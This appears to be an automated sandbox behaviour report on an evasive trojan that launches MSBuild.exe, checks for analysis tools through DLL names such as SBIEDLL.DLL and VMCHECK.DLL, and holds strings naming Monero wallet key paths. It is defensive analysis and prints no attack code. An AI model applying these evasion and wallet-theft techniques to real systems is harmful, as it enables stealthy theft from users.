Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49770 version: TLS 1.2

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DC2021	0_2_00DC2021
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E1A1BB	0_2_00E1A1BB
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DC729C	0_2_00DC729C
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DDD39B	0_2_00DDD39B
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E0E36F	0_2_00E0E36F
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E064F5	0_2_00E064F5
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E0945D	0_2_00E0945D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E1A559	0_2_00E1A559
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E086FD	0_2_00E086FD
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DD572C	0_2_00DD572C
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E1A92B	0_2_00E1A92B
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DCCAF2	0_2_00DCCAF2
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DDBB36	0_2_00DDBB36
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DD3C92	0_2_00DD3C92
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DC1D79	0_2_00DC1D79
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E19D26	0_2_00E19D26
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E1AD13	0_2_00E1AD13
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DCFEF0	0_2_00DCFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041C585	3_2_0041C585
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041B825	3_2_0041B825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042DA53	3_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042D2E3	3_2_0042D2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042CE4E	3_2_0042CE4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041961D	3_2_0041961D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042DE3B	3_2_0042DE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042D681	3_2_0042D681

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104E7 appears 38 times
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: String function: 00DC7B80 appears 49 times

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276

Source: lCVFGKfczi.exe, 00000000.00000000.1669136204.0000000000E50000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs lCVFGKfczi.exe
Source: lCVFGKfczi.exe	Binary or memory string: OriginalFilenameproquota.exej% vs lCVFGKfczi.exe

Source: lCVFGKfczi.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: lCVFGKfczi.exe

Static PE information: Section: .data ZLIB complexity 0.9919471153846153

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/10@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,VariantClear,

3_2_00411807

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AZZQ6A01.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7436
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7404

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: lCVFGKfczi.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lCVFGKfczi.exe

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\lCVFGKfczi.exe "C:\Users\user\Desktop\lCVFGKfczi.exe"
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1428
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: lCVFGKfczi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: lCVFGKfczi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: lCVFGKfczi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: lCVFGKfczi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: lCVFGKfczi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: lCVFGKfczi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: lCVFGKfczi.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: lCVFGKfczi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: lCVFGKfczi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: lCVFGKfczi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: lCVFGKfczi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: lCVFGKfczi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: lCVFGKfczi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_0042594E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

3_2_0042594E

Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00DC71AD push ecx; ret	0_2_00DC71C0
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E1C13A push ecx; ret	0_2_00E1C14D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E1C2D8 push ds; retn 0003h	0_2_00E1C38D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E1C39E push ds; retn 0003h	0_2_00E1C38D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E1C454 push ds; retf 0003h	0_2_00E1C455
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E1E9ED push 0000004Ch; iretd	0_2_00E1E9FE
Source: C:\Users\user\Desktop\lCVFGKfczi.exe	Code function: 0_2_00E0ADAD push ecx; ret	0_2_00E0ADC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042F262 push ecx; ret	3_2_0042F275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00422E59 push esi; ret	3_2_00422E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041DED5 push ecx; ret	3_2_0041DEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 3.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lCVFGKfczi.exe.dedad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lCVFGKfczi.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: lCVFGKfczi.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: lCVFGKfczi.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: lCVFGKfczi.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL21:49:5921:49:5921:49:5921:49:5921:49:5921:49:59DELAYS.TMP%S%SNTDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

API coverage: 4.0 %

Source: C:\Users\user\Desktop\lCVFGKfczi.exe

Code function: 0_2_00DD9ABF FindFirstFileExW,

0_2_00DD9ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

